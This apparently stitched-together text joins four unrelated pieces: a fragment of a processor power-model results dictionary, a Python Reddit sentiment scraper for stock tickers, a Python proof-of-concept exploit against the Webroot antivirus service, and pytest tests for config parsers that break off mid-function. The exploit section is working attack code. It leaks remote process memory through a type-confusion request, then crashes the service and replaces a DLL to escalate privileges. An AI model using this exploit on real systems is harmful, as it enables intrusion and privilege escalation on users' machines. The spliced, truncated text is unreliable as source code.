0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.238751, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.17507, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0872014, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0113512, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127826, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0839494, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.215027, 'Execution Unit/Register Files/Runtime Dynamic': 0.0953006, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.296452, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.664562, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power 
gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 2.3807, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00104668, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00104668, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00094767, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local 
Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000386556, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00120594, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00424697, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00874871, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch 
Unit/Instruction Buffer/Runtime Dynamic': 0.0807027, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.13338, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.197733, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.274103, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.60103, 'Instruction Fetch Unit/Runtime Dynamic': 0.565534, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0106112, 'L2/Runtime Dynamic': 0.00257414, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.59737, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.13741, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0763597, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0763598, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.95796, 'Load Store Unit/Runtime Dynamic': 1.59035, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.18829, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.376581, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0668247, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0669445, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.319175, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0325325, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.590077, 'Memory Management Unit/Runtime Dynamic': 0.0994771, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 20.9242, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End 
RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.229387, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.0150015, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.135244, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.379633, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 5.01827, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}], 'DRAM': {'Area': 0, 'Gate Leakage': 0, 'Peak Dynamic': 0.07524708409127963, 'Runtime Dynamic': 0.07524708409127963, 'Subthreshold Leakage': 4.252, 'Subthreshold Leakage with power gating': 4.252}, 'L3': [{'Area': 61.9075, 'Gate Leakage': 0.0484137, 'Peak Dynamic': 0.0323138, 'Runtime Dynamic': 0.0200653, 'Subthreshold Leakage': 6.80085, 'Subthreshold Leakage with power gating': 3.32364}], 'Processor': {'Area': 191.908, 'Gate Leakage': 1.53485, 'Peak Dynamic': 93.1015, 'Peak Power': 126.214, 'Runtime Dynamic': 27.3164, 'Subthreshold Leakage': 31.5774, 'Subthreshold Leakage with power gating': 13.9484, 'Total 
Cores/Area': 128.669, 'Total Cores/Gate Leakage': 1.4798, 'Total Cores/Peak Dynamic': 93.0692, 'Total Cores/Runtime Dynamic': 27.2963, 'Total Cores/Subthreshold Leakage': 24.7074, 'Total Cores/Subthreshold Leakage with power gating': 10.2429, 'Total L3s/Area': 61.9075, 'Total L3s/Gate Leakage': 0.0484137, 'Total L3s/Peak Dynamic': 0.0323138, 'Total L3s/Runtime Dynamic': 0.0200653, 'Total L3s/Subthreshold Leakage': 6.80085, 'Total L3s/Subthreshold Leakage with power gating': 3.32364, 'Total Leakage': 33.1122, 'Total NoCs/Area': 1.33155, 'Total NoCs/Gate Leakage': 0.00662954, 'Total NoCs/Peak Dynamic': 0.0, 'Total NoCs/Runtime Dynamic': 0.0, 'Total NoCs/Subthreshold Leakage': 0.0691322, 'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
"""Reddit scraper for r/wallstreetbets.

Finds posts that mention stock tickers (loaded from ``tickers.csv``),
scores the post titles with two sentiment tools (TextBlob and NLTK's
VADER), and aggregates per-ticker vote/comment/sentiment statistics.
"""

import csv
import json
import os
import re

import praw
import requests
from textblob import TextBlob
import nltk
# Download the VADER lexicon once, if not already installed:
# nltk.download('vader_lexicon')
from nltk.sentiment.vader import SentimentIntensityAnalyzer

sia = SentimentIntensityAnalyzer()

# NOTE(review): the original hard-coded (and partially redacted) the Reddit
# credentials, which was both a security problem and a syntax error
# (`password=<PASSWORD>`, plus an undefined `usernames` variable).  The
# secrets are now pulled from the environment instead of being committed.
client_ids = "YkfkaYL9JKVtOw"
client_secrets = os.environ.get("REDDIT_CLIENT_SECRET", "")
user_agents = "James"
usernames = os.environ.get("REDDIT_USERNAME", "")
passwords = os.environ.get("REDDIT_PASSWORD", "")

reddit = praw.Reddit(
    client_id=client_ids,
    client_secret=client_secrets,
    user_agent=user_agents,
    username=usernames,
    password=passwords,
)


class StockPost(object):
    """Aggregated information about one ticker-mentioning Reddit post."""

    def __init__(self, postID, postURL, ups, text, downs, numComments,
                 stock, positive, negative, neutral):
        self.postID = postID
        self.url = postURL
        self.stock = stock
        self.ups = ups
        self.text = text
        self.downs = downs
        self.numComments = numComments
        self.positive = positive
        self.negative = negative
        self.neutral = neutral

    def jsonEnc(self):
        """Return a plain dict representation suitable for ``json.dumps``."""
        return {'stock': self.stock, 'postID': self.postID,
                'postURL': self.url, 'ups': self.ups, 'downs': self.downs,
                'text': self.text, 'numComments': self.numComments,
                'positive': self.positive, 'neutral': self.neutral,
                'negative': self.negative}


def jsonDefEncoder(obj):
    """``json.dumps`` default hook: prefer an object's ``jsonEnc`` method."""
    if hasattr(obj, 'jsonEnc'):
        return obj.jsonEnc()
    # Fallback behavior: serialize the instance attribute dict.
    return obj.__dict__


def text_blob_sentiment(review, sub_entries_textblob, stockSentiment, stock):
    """Classify *review* by TextBlob polarity and update both tallies.

    Increments the global ``sub_entries_textblob`` counters and the
    per-ticker ``stockSentiment[stock]`` counters, then returns the label.
    """
    analysis = TextBlob(review)
    polarity = analysis.sentiment.polarity
    # The original nested a redundant `> 0` / `<= 0` check inside each
    # branch; the outer threshold already implies it, so it was dropped.
    if polarity >= 0.0001:
        sub_entries_textblob['positive'] = sub_entries_textblob['positive'] + 1
        stockSentiment[stock]['positive'] = stockSentiment[stock]['positive'] + 1
        return 'Positive'
    elif polarity <= -0.0001:
        sub_entries_textblob['negative'] = sub_entries_textblob['negative'] + 1
        stockSentiment[stock]['negative'] = stockSentiment[stock]['negative'] + 1
        return 'Negative'
    else:
        sub_entries_textblob['neutral'] = sub_entries_textblob['neutral'] + 1
        stockSentiment[stock]['neutral'] = stockSentiment[stock]['neutral'] + 1
        return 'Neutral'


def merge(a, b, path=None):
    """Merge ``b`` into ``a``, one level deep.

    Only keys already present in ``a`` are merged; for those keys every
    sub-item of ``b[key]`` overwrites/extends ``a[key]``.  ``path`` is
    accepted for call compatibility but unused.
    """
    if path is None:
        path = []
    for key in b:
        if key in a:
            for item in b[key]:
                a[key][item] = b[key][item]
    return a


# Sentiment analysis function for the VADER tool.
def nltk_sentiment(review, sub_entries_nltk, stockSentiment, stock):
    """Classify *review* with NLTK VADER and update both tallies.

    Positive when the negative score is small and pos > neg; Negative
    when the positive score is small and pos <= neg; Neutral otherwise.
    """
    vs = sia.polarity_scores(review)
    if not vs['neg'] > 0.05:
        if vs['pos'] - vs['neg'] > 0:
            sub_entries_nltk['positive'] = sub_entries_nltk['positive'] + 1
            stockSentiment[stock]['positive'] = stockSentiment[stock]['positive'] + 1
            return 'Positive'
        sub_entries_nltk['neutral'] = sub_entries_nltk['neutral'] + 1
        stockSentiment[stock]['neutral'] = stockSentiment[stock]['neutral'] + 1
        return 'Neutral'
    elif not vs['pos'] > 0.05:
        if vs['pos'] - vs['neg'] <= 0:
            sub_entries_nltk['negative'] = sub_entries_nltk['negative'] + 1
            stockSentiment[stock]['negative'] = stockSentiment[stock]['negative'] + 1
            return 'Negative'
        sub_entries_nltk['neutral'] = sub_entries_nltk['neutral'] + 1
        stockSentiment[stock]['neutral'] = stockSentiment[stock]['neutral'] + 1
        return 'Neutral'
    else:
        sub_entries_nltk['neutral'] = sub_entries_nltk['neutral'] + 1
        stockSentiment[stock]['neutral'] = stockSentiment[stock]['neutral'] + 1
        return 'Neutral'


def update_stock(stockTickers, stock, post):
    """Fold one praw submission's stats into the per-ticker aggregate."""
    entry = stockTickers[str(stock)]
    entry['postID'].append(post.id)
    entry['postURL'].append(post.permalink)
    entry['text'].append(post.selftext)
    entry['ups'] += post.ups
    entry['downs'] += post.downs
    entry['numComments'] += post.num_comments


class SubredditScraper:
    """Iterates a subreddit listing and aggregates ticker mentions."""

    def __init__(self, sub, sort='new', lim=900):
        self.sub = sub
        self.sort = sort
        self.lim = lim
        print(f'SubredditScraper instance created with values '
              f'sub = {sub}, sort = {sort}, lim = {lim}')

    def set_sort(self):
        """Return ``(sort_name, listing_generator)`` for the chosen sort."""
        if self.sort == 'new':
            return self.sort, reddit.subreddit(self.sub).new(limit=self.lim)
        elif self.sort == 'top':
            return self.sort, reddit.subreddit(self.sub).top(limit=self.lim)
        elif self.sort == 'hot':
            return self.sort, reddit.subreddit(self.sub).hot(limit=self.lim)
        else:
            self.sort = 'hot'
            print('Sort method was not recognized, defaulting to hot.')
            return self.sort, reddit.subreddit(self.sub).hot(limit=self.lim)

    def get_posts(self):
        """Get unique posts from a specified subreddit and tally sentiment."""
        sub_entries_textblob = {'negative': 0, 'positive': 0, 'neutral': 0}
        sub_entries_nltk = {'negative': 0, 'positive': 0, 'neutral': 0}
        stockSentiment = {}
        stockTickers = {}
        with open('tickers.csv', mode='r') as infile:
            reader = csv.reader(infile)
            for row in reader:
                # Each raw cell looks like "TICKER,<rest>"; keep the ticker
                # part only.  (Raises ValueError if no comma is present —
                # same as the original.)
                row[0] = row[0][:row[0].index(",")]
                stockTickers[row[0]] = {
                    'stock': row[0], 'postID': [], 'postURL': [],
                    'ups': 0, 'downs': 0, 'text': [], 'numComments': 0,
                    'positive': 0, 'neutral': 0, 'negative': 0}
                stockSentiment[row[0]] = {'negative': 0, 'positive': 0,
                                          'neutral': 0}

        # Attempt to specify a sorting method.
        sort, subreddit = self.set_sort()
        print(f'Collecting information from r/{self.sub}.')
        i = 0
        for post in subreddit:
            i = i + 1
            print(i, post.title, post.link_flair_text)
            if post.link_flair_text != 'Meme':
                for stock in stockTickers.keys():
                    # re.escape guards against tickers containing regex
                    # metacharacters (the original interpolated raw text).
                    pattern = r'\s+\$?' + re.escape(stock) + r'\$?\s+'
                    if (re.search(pattern, post.selftext)
                            or re.search(pattern, post.title)):
                        # Original printed "/n" — a typo'd newline escape.
                        print("\n", stock)
                        text_blob_sentiment(post.title, sub_entries_textblob,
                                            stockSentiment, stock)
                        nltk_sentiment(post.title, sub_entries_nltk,
                                       stockSentiment, stock)
                        update_stock(stockTickers, stock, post)

        merge(stockTickers, stockSentiment)
        print(stockTickers['GME'])
        headers = {'Content-type': 'application/json',
                   'Accept': 'application/json'}
        # Posting the aggregate to the backend API is left disabled, as in
        # the original:
        # json_object = json.dumps(stockTickers, default=jsonDefEncoder,
        #                          indent=4)
        # r = requests.post("https://localhost:44360/api/RedditPostsAdmin",
        #                   data=json_object, verify=False, headers=headers)
        # print(r.status_code)


if __name__ == '__main__':
    SubredditScraper('wallstreetbets', lim=200, sort='hot').get_posts()
'''
<NAME>
03-13-2020
Tenable WebRoot PoC — LPE / memory leak.
'''
import socket
import json
import sys, getopt
import struct
import shutil
import os
import time

HOST = '10.0.2.5'  # Webroot Service IP
PORT = 27019       # Webroot Service Port


class UnencodableByte(Exception):
    """Raised when a supplied address byte exceeds 0x7f (unencodable)."""
    pass


class MemoryData:
    '''
    Represents an address and the data found at that address.
    '''

    def __init__(self, address, data):
        self.address = address
        self.data = data


def Usage():
    print("Usage: WebRootPoc.py [OPTION]\r\n"
          " -r\t<32-bit Memory Address in Hex>\tReads Memory from Remote Webroot Instance\r\n"
          " -e\tLocal Privilege Escalation")


def intToByteStr(hexval):
    """Format an int as a two-character lowercase hex string."""
    return '{:02x}'.format(hexval)


'''
@:param - Address bytes
@:returns MemoryData representing address and data found in address

Crafts an HTTP request that satisfies WebRoot service parsing.  Abuses a
type-confusion vulnerability when the "DATA" list is traversed: the Webroot
routine expects list elements of type JSON_OBJ and keys into them.  By
embedding a ["URL"] list element, the JSON parser dereferences the following
crafted string as if it were a JSON object looking for a "URL" key/value pair,
triggering a read-what-where whose result is leaked back in the URL field of
the server's response.  The object type field is padded with "1"s to spoof the
expected type and pass Webroot's check.
'''
def LeakMemory(addr_bytes):
    # Raise an exception if we can't encode the address (any byte > 0x7f).
    addr_bytes = [addr if int(addr, 16) <= 0x7f else None
                  for addr in addr_bytes]
    if None in addr_bytes:
        raise UnencodableByte

    http_lines = []
    http_lines.append("POST / HTTP/1.1")
    http_lines.append("\r\n")
    http_lines.append("Content-Type: application/urltree; charset=utf-8")
    http_lines.append("\r\n")
    http_lines.append("Content-Length:0")
    http_lines.append("\r\n\r\n")
    http_lines.append('{{"VER":1, "OP":1, "DATA":[["URL"], '
                      '["\\u00{}\\u00{}\\u00{}\\u00{}11111111111111111111"]], '
                      '"IDATA":[{{"TOKEN":"1","BCRI":"1"}}], "BRWSR":"Chrome"}}'
                      .format(addr_bytes[0], addr_bytes[1],
                              addr_bytes[2], addr_bytes[3]))

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))
        s.sendall("".join(http_lines).encode())
        http_response = s.recv(1024)

    if http_response == b'':
        return None

    # Get payload from HTTP response.
    payload = http_response.decode('latin1').split('\r\n\r\n')[1]
    try:
        json_response = json.loads(payload)
    except ValueError:
        # BUGFIX: the original referenced `json_response` in this fallback
        # path before it was ever assigned (NameError swallowed by a bare
        # except, always returning None).  Parse the raw payload instead.
        try:
            url_field = payload.split('URL')[1]
        except IndexError:
            return None
    else:
        try:
            url_field = json_response['DATA'][0]['URL']
        except (KeyError, IndexError, TypeError):
            return None

    if url_field == '':
        return None
    # Address is byte-swapped for display (little- to big-endian).
    return MemoryData(
        struct.unpack('>I', struct.pack('<I', int("".join(addr_bytes), 16)))[0],
        url_field)


'''
@param address - Address integer to read memory from.  Address must not
contain bytes greater than 0x7f.
@returns - List of MemoryData objs

Accepts a 32-bit address whose contents will be leaked from the WebRoot
server.  Raises UnencodableByte if an individual address byte exceeds 0x7f,
as bytes in that range are unencodable.
'''
def ReadMemory(address):
    print("\033[94mReading Memory starting @{:08x}...".format(address))
    addr_bytes = [intToByteStr(address & 0x000000ff),
                  intToByteStr(address >> 8 & 0x0000ff),
                  intToByteStr(address >> 16 & 0x00ff),
                  intToByteStr(address >> 24)]
    MemoryDatas = []
    for i in range(0, 0x7f):
        try:
            memDat = LeakMemory(addr_bytes)
        except UnencodableByte:
            print("Unencodable Byte found in supplied address. "
                  "All bytes must be below 0x80")
            sys.exit(-1)
        if memDat is None:
            # increment address past the unreadable byte
            addr_bytes[0] = intToByteStr(int(addr_bytes[0], 16) + 1)
            continue
        # increment address by the number of bytes just leaked
        addr_bytes[0] = intToByteStr(int(addr_bytes[0], 16) + len(memDat.data))
        print("\033[92m@{:08x} - {}\x1b[0m".format(memDat.address, memDat.data))
        MemoryDatas.append(memDat)
        if int(addr_bytes[0], 16) > 0x7f:
            # BUGFIX: the original `return` discarded everything collected
            # so far (returned None); return the accumulated results.
            return MemoryDatas
    return MemoryDatas


'''
Local Privilege Escalation.  By crashing the AV service via an access
violation in the type-confusion bug, we can replace the wrUrl.dll in
%PROGRAMDATA%\WrData\PKG with our own.  This is done by renaming the
"wrUrl" directory.
'''
def LPE():
    try:
        wrUrl_dll = open('wrUrl.dll', 'rb')
    except OSError:
        print("Cannot find mock wrUrl.dll. Ensure it resides in current directory")
        sys.exit(-1)
    PKGPath = os.path.expandvars(r"%PROGRAMDATA%\WRData\PKG")
    PKGPath2 = os.path.expandvars(r"%PROGRAMDATA%\WRData\PKG2")
    try:
        ReadMemory(0)  # Trigger Access Violation
    except ConnectionResetError:
        pass
    time.sleep(3)
    os.rename(PKGPath, PKGPath2)
    shutil.copytree(PKGPath2, PKGPath)
    # replace dll with our own
    shutil.copyfile('wrUrl.dll', os.path.join(PKGPath, 'wrUrl.dll'))


def main(argv):
    if len(argv) == 0:
        Usage()
    try:
        opts, args = getopt.getopt(argv, "r:e")
    except getopt.GetoptError:
        Usage()
        sys.exit(-1)
    for opt, arg in opts:
        if opt == '-r':
            try:
                ReadMemory(int(arg, 16))
            except ConnectionResetError:
                # BUGFIX: the two adjacent string literals lacked a
                # separating space ("...sureAddress...").
                print("Ooops. Didnt get response back from Webroot, probably "
                      "crashed it due to Access Violation. Make sure "
                      "Address is valid in remote WebRoot process or just try "
                      "again after service auto-restarts")
                sys.exit(-1)
        elif opt == '-e':
            LPE()


if __name__ == "__main__":
    main(sys.argv[1:])
# Copyright (c) 2021 <NAME>.
# Distributed under the terms of the MIT License.
# SPDX-License-Identifier: MIT
"""
Test the functions that extract content from configuration files.

The fixtures (arguments to the test functions) are defined in conftest.py
"""
import pytest

from ..parsers import (
    get_pyproject_toml_build,
    get_setup_cfg_extras,
    get_setup_cfg_install,
    parse_requirements,
    parse_sources,
    read_pyproject_toml,
    read_setup_cfg,
)


def _without_comments(requirements):
    """Return the requirement lines that are not comments."""
    return [entry for entry in requirements if not entry.startswith("#")]


@pytest.mark.parametrize(
    "source,expected",
    [
        ("install", {"setup.cfg": ["install_requires"], "pyproject.toml": []}),
        ("build", {"setup.cfg": [], "pyproject.toml": ["build-system"]}),
        ("extras", {"setup.cfg": ["options.extras_require"], "pyproject.toml": []}),
        (
            "install,extras",
            {
                "setup.cfg": ["options.extras_require", "install_requires"],
                "pyproject.toml": [],
            },
        ),
        (
            "extras,build",
            {
                "setup.cfg": ["options.extras_require"],
                "pyproject.toml": ["build-system"],
            },
        ),
        (
            "build,extras,install",
            {
                "setup.cfg": ["options.extras_require", "install_requires"],
                "pyproject.toml": ["build-system"],
            },
        ),
    ],
    ids=["install", "build", "extras", "install,extras", "extras,build", "all"],
)
def test_parse_sources(source, expected):
    "Check the parsing of input data sources"
    assert parse_sources(source) == expected


def test_parse_sources_invalid():
    "Should raise an exception on invalid input"
    with pytest.raises(ValueError) as error:
        parse_sources("something")
    assert "'something'" in str(error)


def test_read_setup_cfg(setup_cfg, setup_cfg_config):
    "Check that setup.cfg is read properly"
    assert read_setup_cfg(setup_cfg) == setup_cfg_config


def test_read_pyproject_toml(pyproject_toml, pyproject_toml_config):
    "Check that pyproject.toml is read properly"
    assert read_pyproject_toml(pyproject_toml) == pyproject_toml_config


def test_parse_requirements_install(setup_cfg_config, setup_cfg_install):
    "Check that setup.cfg parses install requirements properly"
    result = _without_comments(
        parse_requirements(setup_cfg_config, ["install_requires"])
    )
    assert result == setup_cfg_install


def test_parse_requirements_extras(setup_cfg_config, setup_cfg_extras):
    "Check that setup.cfg parses extra requirements properly"
    result = _without_comments(
        parse_requirements(setup_cfg_config, ["options.extras_require"])
    )
    assert result == setup_cfg_extras


def test_parse_requirements_build(pyproject_toml_config, pyproject_toml_build):
    "Check that pyproject.toml parses all requirements properly"
    result = _without_comments(
        parse_requirements(pyproject_toml_config, ["build-system"])
    )
    assert result == pyproject_toml_build


def test_parse_requirements_multiple(
    setup_cfg_config, setup_cfg_extras, setup_cfg_install
):
    "Check that setup.cfg parses all requirements properly"
    result = _without_comments(
        parse_requirements(
            setup_cfg_config, ["options.extras_require", "install_requires"]
        )
    )
    assert result == setup_cfg_extras + setup_cfg_install


def test_parse_requirements_install_fail():
    "Check that parsing fails with an exception"
    with pytest.raises(ValueError) as error:
        get_setup_cfg_install({"options": {"something": []}})
    assert "Missing 'install_requires'" in str(error)


def test_parse_requirements_extras_fail():
    "Check that parsing fails with an exception"
    with pytest.raises(ValueError) as error:
        get_setup_cfg_extras({"options": {"something": []}})
    assert "Missing 'options.extras_require'" in str(error)


def test_parse_requirements_build_fail():
